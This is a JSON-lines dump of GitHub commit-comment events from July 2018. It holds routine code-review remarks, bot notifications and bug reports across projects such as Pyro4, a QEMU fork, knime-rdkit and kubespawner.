{"id":"8043602409","type":"CommitCommentEvent","actor":{"login":"carandraug"},"repo":{"name":"carandraug/Pyro4"},"payload":{"comment":{"id":29902802,"position":34,"line":2085,"path":"src/Pyro4/core.py","commit_id":"63902b87435129b636cf7bf0e9b4ea3623263dec","created_at":"2018-07-31T12:00:27Z","updated_at":"2018-07-31T12:00:27Z","author_association":"OWNER","body":"You can serve objects just fine. Actually, that's our use case, we are serving objects, not classes. We are using Pyro to serve access to hardware. Not only there can be only one instance, that instance must only be created once. If that instance is destroyed, we need to restart the computer (no doubt that's an issue on the hardware but it's an issue we have to work with)."}},"created_at":"2018-07-31T12:00:27Z"}
{"id":"8043607080","type":"CommitCommentEvent","actor":{"login":"greglandrum"},"repo":{"name":"rdkit/knime-rdkit"},"payload":{"comment":{"id":29902812,"position":null,"line":null,"path":null,"commit_id":"4cd2d335f2c79f5d7f4791c12c6535d48b232ce9","created_at":"2018-07-31T12:01:22Z","updated_at":"2018-07-31T12:01:22Z","author_association":"MEMBER","body":"Sounds like something that would really help, but that I should talk to @sithmein about it before I actually do anything. :-)\r\n\r\nThanks for the tip!"}},"created_at":"2018-07-31T12:01:22Z"}
{"id":"8043611996","type":"CommitCommentEvent","actor":{"login":"chihaoyo"},"repo":{"name":"watchout-tw/watchout-common-assets"},"payload":{"comment":{"id":29902822,"position":null,"line":null,"path":null,"commit_id":"2fd07a6bc6d9fce6d8a16916ed1756193f5095b4","created_at":"2018-07-31T12:02:22Z","updated_at":"2018-07-31T12:02:22Z","author_association":"CONTRIBUTOR","body":"This is unnecessary. Use `watchout-common-function/components/Marquee` in page layout. The new Marquee is also no longer modal."}},"created_at":"2018-07-31T12:02:22Z"}
{"id":"8043613003","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902824,"position":33,"line":28,"path":"tests/virtio-console-test.c","commit_id":"6433845f40c5561900d3c8a0560563d224f4eeb3","created_at":"2018-07-31T12:02:35Z","updated_at":"2018-07-31T12:02:35Z","author_association":"OWNER","body":"Super cool! \r\nOk makes more sense passing the eopts, even though I think I made a mess with test options. \r\nBasically, QOSGraphEdgeOptions contains the after_cmd_line, before_cmd_line, void *arg (with size) and name_edge.\r\nHowever, when used in QOSGraphTestOptions, arg becomes the test additional data (and not the edge arg), and name_edge is discarded. I wrote it in qgraph header, but I'm not sure if that's understandable.\r\nYou think is fine like that?"}},"created_at":"2018-07-31T12:02:35Z"}
{"id":"8043619275","type":"CommitCommentEvent","actor":{"login":"sroughley"},"repo":{"name":"rdkit/knime-rdkit"},"payload":{"comment":{"id":29902847,"position":null,"line":null,"path":null,"commit_id":"4cd2d335f2c79f5d7f4791c12c6535d48b232ce9","created_at":"2018-07-31T12:03:53Z","updated_at":"2018-07-31T12:03:53Z","author_association":"NONE","body":"Let me know how it goes... if it works, I might just borrow it too!"}},"created_at":"2018-07-31T12:03:53Z"}
{"id":"8043619314","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902848,"position":128,"line":128,"path":"tests/libqos/virtio-balloon.c","commit_id":"826b128f0ee00cc24c53bf972ed878397b05c4c3","created_at":"2018-07-31T12:03:54Z","updated_at":"2018-07-31T12:03:54Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-31T12:03:54Z"}
{"id":"8043619374","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902849,"position":26,"line":26,"path":"tests/virtio-rng-test.c","commit_id":"af35e956ba2a877f4593d9e2e8a883512df5728c","created_at":"2018-07-31T12:03:55Z","updated_at":"2018-07-31T12:03:55Z","author_association":"NONE","body":"I think it works more or less by chance. It will eventually need to be ported, but not yet."}},"created_at":"2018-07-31T12:03:55Z"}
{"id":"8043619389","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29902850,"position":null,"line":null,"path":null,"commit_id":"ba5a819b5997cb6fbc025a071fc80153f714b636","created_at":"2018-07-31T12:03:55Z","updated_at":"2018-07-31T12:03:55Z","author_association":"COLLABORATOR","body":"Puzzle `352-3a47ae9f` disappeared from [`.drone.yml`](https://github.com/fidals/shopelectro/blob/master/.drone.yml), that's why I closed #449. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-31T12:03:55Z"}
{"id":"8043619597","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29902851,"position":null,"line":null,"path":null,"commit_id":"ba5a819b5997cb6fbc025a071fc80153f714b636","created_at":"2018-07-31T12:03:57Z","updated_at":"2018-07-31T12:03:57Z","author_association":"COLLABORATOR","body":"Puzzle `449-27d8c19e` disappeared from [`docker/dc-volumes.yml`](https://github.com/fidals/shopelectro/blob/master/docker/dc-volumes.yml), that's why I closed #457. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-31T12:03:57Z"}
{"id":"8043619988","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29902854,"position":null,"line":null,"path":null,"commit_id":"ba5a819b5997cb6fbc025a071fc80153f714b636","created_at":"2018-07-31T12:04:03Z","updated_at":"2018-07-31T12:04:03Z","author_association":"COLLABORATOR","body":"Puzzle `457-1bf03782` discovered in   [`docker/docker-compose.yml`](  https://github.com/fidals/shopelectro/blob/master/docker/docker-compose.yml)   and submitted as #464. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-31T12:04:03Z"}
{"id":"8043621560","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-yokomizo/meikaiJAVA_yokomizo"},"payload":{"comment":{"id":29902861,"position":62,"line":62,"path":"DDT-work/java13/shape/UpperRightTri.java","commit_id":"367808367a78cd7c50ec08253045370cb91375aa","created_at":"2018-07-31T12:04:24Z","updated_at":"2018-07-31T12:04:24Z","author_association":"COLLABORATOR","body":"細かいですがループ変数であっても i, j といった1文字変数はやめて意味のある名称にしてください\r\n同じように1文字変数があるのでしたら修正してください(平澤)"}},"created_at":"2018-07-31T12:04:24Z"}
{"id":"8043621908","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902863,"position":26,"line":26,"path":"tests/virtio-rng-test.c","commit_id":"af35e956ba2a877f4593d9e2e8a883512df5728c","created_at":"2018-07-31T12:04:29Z","updated_at":"2018-07-31T12:04:29Z","author_association":"OWNER","body":"so I keep the if? and maybe add a todo?"}},"created_at":"2018-07-31T12:04:29Z"}
{"id":"8043632596","type":"CommitCommentEvent","actor":{"login":"carandraug"},"repo":{"name":"carandraug/Pyro4"},"payload":{"comment":{"id":29902893,"position":45,"line":2096,"path":"src/Pyro4/core.py","commit_id":"63902b87435129b636cf7bf0e9b4ea3623263dec","created_at":"2018-07-31T12:06:41Z","updated_at":"2018-07-31T12:06:41Z","author_association":"OWNER","body":"Doesn't really work because the propose interface has a regular expression to identify which objects should be served. I am thinking instead of using the objects names or class names themselves by default. Since the script is that is being parsed here is part of the configuration, I think it's reasonable to accept that the user will name the variables with whatever names he wants.\r\n\r\nAnd anyway, since I will follow this with zeroconf, there can't be promise of a name, only a suggestion, because there needs to be a way for the server to automatically pick a different name in case there's already an instance on the network with the same name."}},"created_at":"2018-07-31T12:06:41Z"}
{"id":"8043633160","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902895,"position":33,"line":28,"path":"tests/virtio-console-test.c","commit_id":"6433845f40c5561900d3c8a0560563d224f4eeb3","created_at":"2018-07-31T12:06:47Z","updated_at":"2018-07-31T12:06:47Z","author_association":"NONE","body":"It's okay I think. The edge arg is still there, it's simply passed as the test additional data. :) Not having the name_edge (or should it be \"edge_name\"?) for tests is okay too."}},"created_at":"2018-07-31T12:06:47Z"}
{"id":"8043634527","type":"CommitCommentEvent","actor":{"login":"chrisforbesblogs"},"repo":{"name":"chrisforbesblogs/office-docs-powershell"},"payload":{"comment":{"id":29902897,"position":null,"line":null,"path":null,"commit_id":"b72d22e031cf2256462d062ac2ab1855332a94e0","created_at":"2018-07-31T12:07:03Z","updated_at":"2018-07-31T12:07:03Z","author_association":"OWNER","body":"punctuation added"}},"created_at":"2018-07-31T12:07:03Z"}
{"id":"8043637245","type":"CommitCommentEvent","actor":{"login":"Panzer1119"},"repo":{"name":"OmniKryptec/OmniKryptec-Engine"},"payload":{"comment":{"id":29902905,"position":null,"line":null,"path":null,"commit_id":"6230c29e4f6aa44f61e80e877473653adf9aae4e","created_at":"2018-07-31T12:07:37Z","updated_at":"2018-07-31T12:07:37Z","author_association":"COLLABORATOR","body":"„Slowed“ it Slowed the code down, now not more"}},"created_at":"2018-07-31T12:07:37Z"}
{"id":"8043642248","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902924,"position":479,"line":479,"path":"tests/qos-test.c","commit_id":"f29dbbe379a49a54083d7061a90773c2c94f3a49","created_at":"2018-07-31T12:08:37Z","updated_at":"2018-07-31T12:08:37Z","author_association":"OWNER","body":"@bonzini since you're here, take a look at this. It does not work with `make check`, because it adds options for gtest (where it should add `--a` before, otherwise the argument will be parsed by my framework, and not gtest).\r\nMaybe I should do something like \"if that's not recognized by qgraph, give it to gtest?"}},"created_at":"2018-07-31T12:08:37Z"}
{"id":"8043645590","type":"CommitCommentEvent","actor":{"login":"rajaram008"},"repo":{"name":"rajaram008/Python-Assignement2.1"},"payload":{"comment":{"id":29902940,"position":null,"line":null,"path":null,"commit_id":"c02ae63eaf05b6bfac315b089f1fea0dcd65e0ed","created_at":"2018-07-31T12:09:16Z","updated_at":"2018-07-31T12:09:16Z","author_association":"OWNER","body":"remove"}},"created_at":"2018-07-31T12:09:16Z"}
{"id":"8043646548","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29902947,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-31T12:09:28Z","updated_at":"2018-07-31T12:09:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T12:09:28Z"}
{"id":"8043646599","type":"CommitCommentEvent","actor":{"login":"tbazant"},"repo":{"name":"SUSE/doc-ses"},"payload":{"comment":{"id":29902948,"position":null,"line":null,"path":null,"commit_id":"9a57622b03ece757bfc1c98bce6d07aa38cd6694","created_at":"2018-07-31T12:09:29Z","updated_at":"2018-07-31T12:09:29Z","author_association":"COLLABORATOR","body":"[ceph.rgw.https_color_en.pdf](https://github.com/SUSE/doc-ses/files/2245220/ceph.rgw.https_color_en.pdf)\r\n"}},"created_at":"2018-07-31T12:09:29Z"}
{"id":"8043647326","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902950,"position":26,"line":26,"path":"tests/virtio-rng-test.c","commit_id":"af35e956ba2a877f4593d9e2e8a883512df5728c","created_at":"2018-07-31T12:09:38Z","updated_at":"2018-07-31T12:09:38Z","author_association":"NONE","body":"Yeah, just keep the if. The better way would be to add an \"unplug\" function pointer to pci-bus and instead of the arch you check if that function pointer is non-null. But we can leave it for later, since this test is basically bypassing qgraph anyway."}},"created_at":"2018-07-31T12:09:38Z"}
{"id":"8043648448","type":"CommitCommentEvent","actor":{"login":"newnone"},"repo":{"name":"newnone/g-Programming-Projects"},"payload":{"comment":{"id":29902957,"position":null,"line":null,"path":null,"commit_id":"028fb6d14f7bc0fe2e17f8933344c8410bfb931a","created_at":"2018-07-31T12:09:53Z","updated_at":"2018-07-31T12:09:53Z","author_association":"OWNER","body":"Thanks to @forsenonlhaimaisentito for pointing out the aloof inattention to such details."}},"created_at":"2018-07-31T12:09:53Z"}
{"id":"8043652658","type":"CommitCommentEvent","actor":{"login":"KamenGoranchev"},"repo":{"name":"JetBrains/meta-runner-power-pack"},"payload":{"comment":{"id":29902976,"position":null,"line":null,"path":null,"commit_id":"69a2ef687e2ac2903ded72230370b4397275c78a","created_at":"2018-07-31T12:10:46Z","updated_at":"2018-07-31T12:10:46Z","author_association":"NONE","body":"This commit is braking the support of adding multiple tags in the same time. And it is the reason for bug  #124"}},"created_at":"2018-07-31T12:10:46Z"}
{"id":"8043653045","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29902978,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-31T12:10:51Z","updated_at":"2018-07-31T12:10:51Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T12:10:51Z"}
{"id":"8043653402","type":"CommitCommentEvent","actor":{"login":"qwertbob"},"repo":{"name":"qwertbob/P64xDataModel"},"payload":{"comment":{"id":29902980,"position":null,"line":null,"path":null,"commit_id":"55972c72adf7623f6f293189b1db62aa1fef7589","created_at":"2018-07-31T12:10:56Z","updated_at":"2018-07-31T12:10:56Z","author_association":"OWNER","body":"All FC=CO DOs have errors after reading operation.\r\n[iedscouterrors.txt](https://github.com/qwertbob/P64xDataModel/files/2245222/iedscouterrors.txt)\r\n"}},"created_at":"2018-07-31T12:10:56Z"}
{"id":"8043654767","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902985,"position":57,"line":57,"path":"tests/libqos/qgraph.h","commit_id":"998edefae2418d3b7ab35475584e50706909ac29","created_at":"2018-07-31T12:11:11Z","updated_at":"2018-07-31T12:11:11Z","author_association":"OWNER","body":"@bonzini Aaand this, regarding what Stephan was saying in the patches (move qosObject when used) "}},"created_at":"2018-07-31T12:11:11Z"}
{"id":"8043655583","type":"CommitCommentEvent","actor":{"login":"oplarshad"},"repo":{"name":"DrKLO/Telegram"},"payload":{"comment":{"id":29902989,"position":null,"line":null,"path":null,"commit_id":"d073b80063c568f31d81cc88c927b47c01a1dbf4","created_at":"2018-07-31T12:11:20Z","updated_at":"2018-07-31T12:11:20Z","author_association":"NONE","body":"\r\n@sQu1rr : Yes I got the same problem. Please tell me if anybody fixed it.\r\n"}},"created_at":"2018-07-31T12:11:20Z"}
{"id":"8043656618","type":"CommitCommentEvent","actor":{"login":"manuelschwarze"},"repo":{"name":"rdkit/knime-rdkit"},"payload":{"comment":{"id":29902993,"position":null,"line":null,"path":null,"commit_id":"4cd2d335f2c79f5d7f4791c12c6535d48b232ce9","created_at":"2018-07-31T12:11:33Z","updated_at":"2018-07-31T12:11:33Z","author_association":"CONTRIBUTOR","body":"When keeping all version numbers in sync, I usually do this by using the Search/Replace functionality of Eclipse that work on files. I have all subprojects of the knime-rdkit folder in Eclipse as projects mounted. Then I mark all of them. In the menu Search – File … I put in my current version number and search in *.xml files (I think). I include all “Selected Resources” only – these are my subprojects. Then I click the Replace button and I will put in the new version number. Eclipse lets me then review all findings and what it would replace and I can disable all spots that are not my version number, which my happen if another plugin dependency has the same version number as my current version. And then I replace all that I want. And that’s it. But that works only, if really we keep everything in sync, otherwise we would miss one.\r\n\r\n-Manuel\r\n\r\nFrom: Steve Roughley [mailto:notifications@github.com]\r\nSent: Tuesday, July 31, 2018 2:04 PM\r\nTo: rdkit/knime-rdkit <knime-rdkit@noreply.github.com>\r\nCc: Subscribed <subscribed@noreply.github.com>\r\nSubject: Re: [rdkit/knime-rdkit] add avalon and inchi support to win64 binary (4cd2d33)\r\n\r\n\r\nLet me know how it goes... if it works, I might just borrow it too!\r\n\r\n—\r\nYou are receiving this because you are subscribed to this thread.\r\nReply to this email directly, view it on GitHub<https://github.com/rdkit/knime-rdkit/commit/4cd2d335f2c79f5d7f4791c12c6535d48b232ce9#commitcomment-29902847>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AF6uWVZDPuOPZbw6jlLVEgb6Pm5Qj0CIks5uMEepgaJpZM4Vn5d_>.\r\n"}},"created_at":"2018-07-31T12:11:33Z"}
{"id":"8043660268","type":"CommitCommentEvent","actor":{"login":"powelski"},"repo":{"name":"azbroja/crm"},"payload":{"comment":{"id":29902997,"position":14,"line":17,"path":"app/Invoice.php","commit_id":"cbb8150ac463384c711c347a19de4a420b9cecd4","created_at":"2018-07-31T12:12:18Z","updated_at":"2018-07-31T12:12:18Z","author_association":"COLLABORATOR","body":"Coś tu się wkradło."}},"created_at":"2018-07-31T12:12:18Z"}
{"id":"8043660748","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902999,"position":479,"line":479,"path":"tests/qos-test.c","commit_id":"f29dbbe379a49a54083d7061a90773c2c94f3a49","created_at":"2018-07-31T12:12:25Z","updated_at":"2018-07-31T12:12:25Z","author_association":"NONE","body":"I can see how \"-n\" is useful. For now however, I would drop it (well, move it to a separate patch). My hope is that the gtest \"-p\" option will be enough...\r\n\r\nBy the way, this patch should be merged in the one that adds the qgraph data structures."}},"created_at":"2018-07-31T12:12:25Z"}
{"id":"8043662233","type":"CommitCommentEvent","actor":{"login":"chihaoyo"},"repo":{"name":"watchout-tw/watchout-common-assets"},"payload":{"comment":{"id":29903004,"position":null,"line":null,"path":null,"commit_id":"fa42c724128d4236c2d8293ff5c934a0e050f8c4","created_at":"2018-07-31T12:12:44Z","updated_at":"2018-07-31T12:12:44Z","author_association":"CONTRIBUTOR","body":"Removed in https://github.com/watchout-tw/watchout-common-assets/commit/5aa72640d60d212b2cbaf8795be22bb3fa9b60b7"}},"created_at":"2018-07-31T12:12:44Z"}
{"id":"8043664770","type":"CommitCommentEvent","actor":{"login":"chihaoyo"},"repo":{"name":"watchout-tw/watchout-common-assets"},"payload":{"comment":{"id":29903014,"position":null,"line":null,"path":null,"commit_id":"2fd07a6bc6d9fce6d8a16916ed1756193f5095b4","created_at":"2018-07-31T12:13:13Z","updated_at":"2018-07-31T12:13:13Z","author_association":"CONTRIBUTOR","body":"Removed in https://github.com/watchout-tw/watchout-common-assets/commit/5c207de444b2a23d6fcd158b72cab631b65ba8e3"}},"created_at":"2018-07-31T12:13:13Z"}
{"id":"8043664900","type":"CommitCommentEvent","actor":{"login":"LeighSu"},"repo":{"name":"tramphero/kaldi"},"payload":{"comment":{"id":29903015,"position":45,"line":45,"path":"egs/librispeech/s5/local/nnet/run_fsmn_ivector.sh","commit_id":"f484e57da9602b712995796cd522495712e0fc50","created_at":"2018-07-31T12:13:15Z","updated_at":"2018-07-31T12:13:15Z","author_association":"NONE","body":"Hi, I am trying to reproduce this.\r\nBut I cannot found how the data of exp/nnet3_cleaned/ivectors_train_960_cleaned_hires  and exp/nnet3_cleaned/ivectors_train_960_dev_hires was generated.\r\nThe script failed here."}},"created_at":"2018-07-31T12:13:15Z"}
{"id":"8043664969","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29903016,"position":57,"line":57,"path":"tests/libqos/qgraph.h","commit_id":"998edefae2418d3b7ab35475584e50706909ac29","created_at":"2018-07-31T12:13:15Z","updated_at":"2018-07-31T12:13:15Z","author_association":"NONE","body":"Leave everything as it is. Just squash the gtest integration patch into this one."}},"created_at":"2018-07-31T12:13:15Z"}
{"id":"8043666124","type":"CommitCommentEvent","actor":{"login":"LeighSu"},"repo":{"name":"tramphero/kaldi"},"payload":{"comment":{"id":29903020,"position":45,"line":45,"path":"egs/librispeech/s5/local/nnet/run_fsmn_ivector.sh","commit_id":"f484e57da9602b712995796cd522495712e0fc50","created_at":"2018-07-31T12:13:29Z","updated_at":"2018-07-31T12:13:29Z","author_association":"NONE","body":"在线等"}},"created_at":"2018-07-31T12:13:29Z"}
{"id":"8043667949","type":"CommitCommentEvent","actor":{"login":"sroughley"},"repo":{"name":"rdkit/knime-rdkit"},"payload":{"comment":{"id":29903024,"position":null,"line":null,"path":null,"commit_id":"4cd2d335f2c79f5d7f4791c12c6535d48b232ce9","created_at":"2018-07-31T12:13:52Z","updated_at":"2018-07-31T12:13:52Z","author_association":"NONE","body":"I normally do this within a working set, with a File Search limited to  MANIFEST.MF, plugin.xml and feature.xml, and also add the '.qualifier', e.g. '1.17.2.qualifier' - I've never yet had that pick anything else up, as the dependencies dont include the suffix"}},"created_at":"2018-07-31T12:13:52Z"}
{"id":"8043668603","type":"CommitCommentEvent","actor":{"login":"chang-zhijie"},"repo":{"name":"jupyterhub/kubespawner"},"payload":{"comment":{"id":29903026,"position":29,"line":86,"path":"kubespawner/spawner.py","commit_id":"27056a79580df957d0cc2d7b61ecfa4ce694e4fd","created_at":"2018-07-31T12:14:01Z","updated_at":"2018-07-31T12:14:01Z","author_association":"NONE","body":"if c.KubeSpawner.events_enabled configured False, this \"return self.reflectors['events']\" will raise exception."}},"created_at":"2018-07-31T12:14:01Z"}
{"id":"8043676245","type":"CommitCommentEvent","actor":{"login":"Onikiro"},"repo":{"name":"Ryuu-san/maquette"},"payload":{"comment":{"id":29903047,"position":128,"line":128,"path":"CSS styles.css","commit_id":"c0da85cb017ce163020f063c68429b366c22c7e6","created_at":"2018-07-31T12:15:32Z","updated_at":"2018-07-31T12:15:32Z","author_association":"NONE","body":".content-notbook -> .content-notebook "}},"created_at":"2018-07-31T12:15:32Z"}
{"id":"8043678226","type":"CommitCommentEvent","actor":{"login":"Onikiro"},"repo":{"name":"Ryuu-san/maquette"},"payload":{"comment":{"id":29903051,"position":212,"line":212,"path":"CSS styles.css","commit_id":"c0da85cb017ce163020f063c68429b366c22c7e6","created_at":"2018-07-31T12:15:56Z","updated_at":"2018-07-31T12:15:56Z","author_association":"NONE","body":"sumbols->symbols"}},"created_at":"2018-07-31T12:15:56Z"}
{"id":"8043679061","type":"CommitCommentEvent","actor":{"login":"nicolas-raoul"},"repo":{"name":"commons-app/apps-android-commons"},"payload":{"comment":{"id":29903060,"position":24,"line":104,"path":"app/src/main/java/fr/free/nrw/commons/upload/UploadController.java","commit_id":"e7270783e481022bbd53e95ac1ee976c4ae65095","created_at":"2018-07-31T12:16:07Z","updated_at":"2018-07-31T12:16:07Z","author_association":"MEMBER","body":"These 6 lines almost duplicate the source code that follows. Is it intended?"}},"created_at":"2018-07-31T12:16:07Z"}
{"id":"8043681650","type":"CommitCommentEvent","actor":{"login":"chang-zhijie"},"repo":{"name":"jupyterhub/kubespawner"},"payload":{"comment":{"id":29903071,"position":29,"line":86,"path":"kubespawner/spawner.py","commit_id":"27056a79580df957d0cc2d7b61ecfa4ce694e4fd","created_at":"2018-07-31T12:16:40Z","updated_at":"2018-07-31T12:16:40Z","author_association":"NONE","body":"File \"/code/anaconda/envs/python36/lib/python3.6/site-packages/kubespawner/spawner.py\", line 1486, in _start\r\n  events = self.events\r\nFile \"/code/anaconda/envs/python36/lib/python3.6/site-packages/kubespawner/spawner.py\", line 1344, in events\r\n  if not self.event_reflector:\r\nFile \"/code/anaconda/envs/python36/lib/python3.6/site-packages/kubespawner/spawner.py\", line 86, in event_reflector\r\n  return self.reflectors['events']\r\n"}},"created_at":"2018-07-31T12:16:40Z"}
{"id":"8043682695","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29903074,"position":null,"line":null,"path":null,"commit_id":"0c9aefa726c7f2d94c869042697d3624f729d1a4","created_at":"2018-07-31T12:16:53Z","updated_at":"2018-07-31T12:16:53Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2993 of 2996 tests passed, 0 test warnings)\n\nMessages:\n\n * 3 tests had: EIO diffs.\n * 3 tests had: Table big diffs.\n * 2 tests had: ESO big diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 641\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0c9aefa726c7f2d94c869042697d3624f729d1a4-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0c9aefa726c7f2d94c869042697d3624f729d1a4-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-31T12:16:53Z"}
{"id":"8043725051","type":"CommitCommentEvent","actor":{"login":"Himmelt"},"repo":{"name":"Himmelt/Quorra"},"payload":{"comment":{"id":29903204,"position":null,"line":null,"path":null,"commit_id":"f02e4416f8999f14eceaaee60e12cd214d83c0d6","created_at":"2018-07-31T12:25:25Z","updated_at":"2018-07-31T12:25:25Z","author_association":"OWNER","body":"fix #4 "}},"created_at":"2018-07-31T12:25:25Z"}
{"id":"8043726633","type":"CommitCommentEvent","actor":{"login":"bensku"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29903206,"position":24,"line":69,"path":"src/main/java/ch/njol/skript/expressions/ExprIdOf.java","commit_id":"c904c55a27501c9ed681528b9620a3afd64cceb6","created_at":"2018-07-31T12:25:44Z","updated_at":"2018-07-31T12:25:44Z","author_association":"MEMBER","body":"MethodHandle performance is comparable to direct method call performance if it is stored in a final static field. Access checks are done ahead of time instead of each time the handle is used. And if you create a MethodHandle, you *have* to catch some checked exceptions no matter how sure you are about existence of the method."}},"created_at":"2018-07-31T12:25:44Z"}
{"id":"8043726759","type":"CommitCommentEvent","actor":{"login":"ohartenstein23"},"repo":{"name":"ohartenstein23/OpenXcom"},"payload":{"comment":{"id":29903207,"position":168,"line":2198,"path":"src/Battlescape/BattlescapeGame.cpp","commit_id":"3400679ce5ec9b941481769f333f585ca8e42821","created_at":"2018-07-31T12:25:46Z","updated_at":"2018-07-31T12:25:46Z","author_association":"OWNER","body":"Maybe move the explosion/spawning to the forRemoval loop below, as spawning units can create new items in the save, modifying the vector over which we are looping?"}},"created_at":"2018-07-31T12:25:46Z"}
{"id":"8043730285","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29903212,"position":283,"line":283,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/interface.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-31T12:26:27Z","updated_at":"2018-07-31T12:26:27Z","author_association":"OWNER","body":"Da tochno...ispravl"}},"created_at":"2018-07-31T12:26:27Z"}
{"id":"8043730311","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29903213,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-31T12:26:28Z","updated_at":"2018-07-31T12:26:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T12:26:28Z"}
